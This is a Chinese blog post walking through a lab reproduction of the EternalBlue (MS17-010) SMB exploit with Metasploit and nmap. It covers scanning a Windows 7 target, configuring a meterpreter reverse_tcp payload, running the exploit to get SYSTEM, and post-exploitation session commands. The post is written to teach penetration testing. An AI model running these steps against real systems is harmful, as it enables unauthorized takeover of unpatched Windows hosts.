Jay jay
文章28
标签2
分类0
永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)

MSF简介

metasploit framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知软件漏洞,并保持持续更新,metaspolit可以用来信息搜集、漏洞探测、漏洞利用等渗透测试的全流程,在kali中自带了。

基本命令

基础命令

#进入msf
msfconsole
#使用search查找相关漏洞
search ms17-010
#使用use进入模块
use 数字
#使用info查看模块xinxi
info
#设置poc连接方式
set payload windows/x64/meterpreter/reverse_tcp
#查看模块需要配置的参数
show options
#设置参数
set RHOST 地址
#攻击
exploit / run
#回退
back

后渗透命令

#查看当前用户
getuid
#进入shell
shell
#解决shell乱码
chcp 65001
#推出shell
exit
#把会话放到后台
background
#查看会话
sessions
#进入某个会话
session -i id号
#删除会话
session -k id号

ms17-010漏洞复现

漏洞介绍

永恒之蓝(ms17-010)爆发于2017年4月14日,是一种利用windows系统smb协议漏洞来获取系统最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日不法分子通过改造永恒之蓝制作了wannnacry勒索病毒,使全世界大范围遭受该勒索病毒,该病毒后来被微软修复。存在漏洞的主机只要开放445端口即可被攻击获取系统最高权限。

影响版本目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

漏洞复现

在msf中利用ms17-010漏洞来攻击系统,以初步熟悉msf工具

复现环境:攻击机为kali 被攻击机为win7 关闭防火墙

1、主机发现

在kali中使用nmap扫描win7开放端口
nmap win7地址 -O操作系统识别 -sS -T4
下一步需要学习nmap工具的使用
扫描发现可以使用

2、永恒之蓝漏洞探测

先进入msf,然后搜索ms17-010的漏洞模块
进入msf搜索漏洞并使用

3、我们使用scanner模块对主机进行扫描,检测是否存在漏洞,use 1首先查看模块信息使用info命令查看
扫描测试模块

4、如何利用模块对主机扫描,只需要使用show options选项,查看我们需要输入的具体参数,其中表注了yes的选项是必须的参数,若参数为空则需要我们填写,RHOSTS选项为空,所以我们需要填写,代表攻击目标,输入r使用tab补全该参数
配置扫描目标

5、使用run执行
扫描测试成功可以利用

6、使用攻击模块并重复上述设置
查看信息
7、配置目标
配置目标
8、使用run执行攻击
执行
如果发现攻击失败,这里出现的原因可能是防火墙未关闭,远程连接没有打开,或者是补丁的原因,这里是补丁原因参考连接
补丁全部卸载把可以卸载的都卸了卸载完成重启
重启后再次执行永恒之蓝利用程序测试
成功
可以看到成功获取到了win7的system权限并且可以成功执行命令
命令
注意:在这里我直接使用攻击模块去攻击的并没有扫描所以才会在攻击那块攻击失败,而扫描是攻击成功后加上去的,正规流程是扫描就会报错然后删除补丁重新扫描成功在利用攻击模块攻击

9、使用exit可以推出当前shell使用background可以将会话放到msf后台使用sessions可以查看后台shell使用sessions -i id号可以进入相关shell

获取权限

本文作者:Jay jay
本文链接:https://yyj-xx.github.io/2023/04/15/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88ms17-010%EF%BC%89/
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可